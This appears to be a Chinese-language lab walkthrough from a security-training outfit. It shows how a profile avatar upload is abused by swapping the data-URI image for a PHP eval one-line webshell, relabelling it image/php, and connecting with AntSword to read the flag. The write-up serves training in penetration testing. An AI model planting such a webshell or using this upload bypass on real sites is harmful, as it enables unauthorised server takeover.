某靶场题目的通关记录,反正是不知道叫啥~
打开页面之后,
在右上角这一块有注册和登录
那没的说,有这个,必定是先注册登录一波。
登录之后跳转到个人中心,
看到有一个修改头像的地方~
接下来……
上图片马还是直接上一句话?
嗯……要不还是来个一句话试试先~
直接小手点一点插件,发现是PHP的脚本语言。
来个PHP的一句话马~
到 位 了~
尝试看看能不能直接上马,但是…
那就打开BP来拦包~
上传个正常的图片抓个包看看~
发现内容是加密传输的,那就…… 整上
保留前面的这一段,后面我们直接写上一句话马:
image=data:image/jpeg;,
所以这一段内容为:
image=data:image/jpeg;,<?php @eval($_POST['yusun']); ?>
接下来,需要更改一下类型,
把image/jpeg 改为 image/php,
使其当成php存储
然后把一句话马的内容加密
将数据包里的原内容删除,
替换为我们加密后的内容
点击发送数据包。
通过响应包发现有个保存路径,
打开蚁剑尝试连接一下
将响应包所返回路径中的反斜杠去掉,
拼接URL,填入密码,测试连接~
哎嘿,绿色就是好看。
在目录里面找到了Flag文件,复制内容,提交~
就很perfect~相当完美。
后续将给大家带来更多靶场实操案例,更多渗透测试干货持续关注雨笋教育小编
*本文章仅供技术交流分享,请勿做未授权违法攻击,雨笋教育不负任何责任。具体请参考《网络安全法》。